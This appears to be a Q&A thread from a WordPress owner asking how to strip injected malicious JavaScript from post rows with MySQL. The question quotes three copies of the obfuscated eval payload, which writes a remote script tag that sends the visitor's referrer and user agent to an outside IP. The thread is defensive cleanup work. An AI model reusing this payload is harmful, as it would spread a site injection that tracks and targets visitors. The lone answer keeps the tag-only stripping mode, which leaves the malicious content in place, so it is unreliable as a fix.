# Use function, prodecure, or regex to remove all content between tags in MySQL table

Tags: mysql, regex, function

A malicious JavaScript eval function has been injected into multiple post_content table rows in WordPress and it needs to be removed using a MySQL function or regex.

I have tried using existing strip tags functions, but as they only remove the tags around the malicious code, it is not solving my problem. I am thinking a combination of this function and a regex would be enough to remove the malicious code. I am a novice when it comes to understanding regular expressions and MySQL functions.

Malicious code examples:

```
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("<a g=\'2\' c=\'d\' e=\'b/2\' 4=\'7://5.8.9.f/1/h.s.t?r="+3(0.p)+"\\o="+3(j.i)+"\'><\\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ryiyb|var|u0026u|referrer|kiahk||js|php'.split('|'),0,{}))
```

```
<img eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("<a g=\'2\' c=\'d\' e=\'b/2\' 4=\'7://5.8.9.f/1/h.s.t?r="+3(0.p)+"\\o="+3(j.i)+"\'><\\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|efbab|var|u0026u|referrer|deaky||js|php'.split('|'),0,{}))
 class="alignnone size-full wp-image-5769" src="http://www.example.com/wp-content/uploads/IMG_3180-e1475090069840.jpg" alt="img_3180" width="2448" height="3264" />
```

```
<noindex>eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("<a g=\'2\' c=\'d\' e=\'b/2\' 4=\'7://5.8.9.f/1/h.s.t?r="+3(0.p)+"\o="+3(j.i)+"\'><\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bfahe|var|u0026u|referrer|kbdke||js|php'.split('|'),0,{}))
</noindex>
```

Unsuccessful regex example used in phpMyAdmin query on post_content table with operator set to REGEXP:

```
<noindex>(.*\\?)</noindex>
```

Strip tags function and UPDATE command:

```
DELIMITER $$
CREATE FUNCTION strip_certain_tags($str text, $tag text, $keep_phrase bool) RETURNS text
    BEGIN
        DECLARE $start, $end INT DEFAULT 1;
        SET $str = COALESCE($str, '');
        LOOP
            SET $start = LOCATE(CONCAT('<', $tag), $str, $start);
            IF (!$start) THEN RETURN $str; END IF;
            IF ($keep_phrase) THEN
                SET $end = LOCATE('>', $str, $start);
                IF (!$end) THEN SET $end = $start; END IF;
                SET $str = INSERT($str, $start, $end - $start + 1, '');
                SET $str = REPLACE($str, CONCAT('</', $tag, '>'), '');
            ELSE
                SET $end = LOCATE(CONCAT('</', $tag, '>'),$str,$start);
                IF (!$end) THEN 
                    SET $end = LOCATE('/>',$str,$start); 
                    SET $str = INSERT($str, $start, $end - $start + 2, '');
                ELSE 
                    SET $str = INSERT($str, $start, $end - $start 
                       + LENGTH(CONCAT('</', $tag, '>')), '');
                END IF;
            END IF;
        END LOOP;
    END$$
DELIMITER ;

UPDATE wp_posts SET post_content = strip_certain_tags(post_content, 'noindex', true);
```

Comment: `strip_certain_tags` doesn't use a regular expression. What's the question?

Comment: Unless you're using MySQL 8.0, it doesn't have any built-in functions for locating and replacing regular expressions. All it has is the `RLIKE` operator, which will tell if a column matches the regular expression.

Comment: @Barmar The question is can the function be combined with a regular expression to achieve the goal, or would a separate approach be necessary to find and replace all of the malicious code.

Comment: You can use `WHERE post_content RLIKE '<noindex>(.*)</noindex>'`

Answer (score 0):

Add a `WHERE` clause so you only process the rows that match the regexp.

```
UPDATE wp_posts 
SET post_content = strip_certain_tags(post_content, 'noindex', true)
WHERE post_content RLIKE '<noindex>.*\n?</noindex>';
```

`\n` matches the newline